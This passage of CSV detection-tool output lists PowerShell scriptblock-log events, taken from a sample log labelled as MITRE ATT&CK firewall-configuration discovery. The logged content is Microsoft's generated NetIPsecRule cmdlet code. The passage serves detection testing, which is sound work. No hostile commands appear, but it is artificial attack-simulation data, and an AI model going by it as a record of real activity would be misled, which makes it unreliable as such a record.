-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickMod",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
$__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] 
[Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parame",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 